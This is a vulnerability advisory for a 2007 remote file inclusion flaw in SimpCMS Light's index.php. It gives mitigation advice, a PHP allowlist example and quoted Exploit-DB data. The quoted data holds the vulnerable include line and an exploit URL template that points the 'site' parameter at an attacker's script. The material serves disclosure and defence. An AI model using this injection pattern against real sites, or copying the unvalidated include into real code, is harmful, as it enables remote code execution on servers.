Vendor: SimpCMS Light
By: Dr.RoVeR (Arab48 Hacker)
CVSS: 7.5 (HIGH)
Type: Arbitrary File Inclusion
CWE: 98
Product Name: SimpCMS Light
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SimpCMS Light Arbitrary File Inclusion Vulnerability

The SimpCMS Light script is vulnerable to arbitrary file inclusion. The vulnerable code is on line 31 of 'index.php', where the script includes the file specified by the 'site' parameter. An attacker can exploit this by supplying a malicious script as the 'site' parameter, leading to arbitrary file inclusion.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or upgrade to a newer version of the SimpCMS Light script. Additionally, input validation and sanitization should be implemented to prevent arbitrary file inclusion attacks.
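
One way to implement the input validation recommended above is an allowlist, shown here as an added example that is not SimpCMS Light code and not part of the original advisory. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example, not SimpCMS Light code. PAGES, PAGE_DIR and resolve_page()
// are hypothetical names chosen for illustration.

// Pattern reported on line 31 of index.php: the request value reaches
// include unchanged.
//   include $site.".php";

// Hardened form: the request value only selects a key in a fixed map,
// so no part of the included path is built from user input.
const PAGES = [                       // assumed page list
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];
const PAGE_DIR = __DIR__ . '/pages';  // assumed location of the page files

function resolve_page($requested): ?string
{
    // Reject non-strings (e.g. ?site[]=x) and anything that is not a known key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside PAGE_DIR,
    // which also catches a symlink that points outside the directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['site'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Setting allow_url_include to Off in php.ini additionally blocks URL-based includes, but it does not replace the allowlist, since local paths remain reachable through an unvalidated include.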
Source

Exploit-DB raw data:

Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR@HackerMail.CoM
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

# milw0rm.com [2007-04-10]